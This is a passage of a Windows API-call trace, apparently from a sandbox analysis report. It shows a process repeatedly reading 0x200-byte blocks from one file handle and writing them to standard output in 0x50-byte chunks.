0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, 
lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.142] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.142] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 
[0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.143] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.143] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] GetFileType (hFile=0x50) returned 0x1 [0211.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.143] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.144] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.144] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, 
lpOverlapped=0x0) returned 1 [0211.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.144] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 
| out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] GetFileType (hFile=0x50) returned 0x1 [0211.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.145] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.145] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.145] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.146] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.146] GetFileType (hFile=0x50) returned 0x1 [0211.146] _get_osfhandle (_FileHandle=1) returned 0x50 
[0211.146] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.147] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.147] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 
[0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.147] GetFileType (hFile=0x50) returned 0x1 [0211.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.148] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.148] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, 
lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] GetFileType (hFile=0x50) returned 0x1 [0211.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.148] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.149] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.149] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType 
(hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] GetFileType (hFile=0x50) returned 0x1 [0211.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.149] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] 
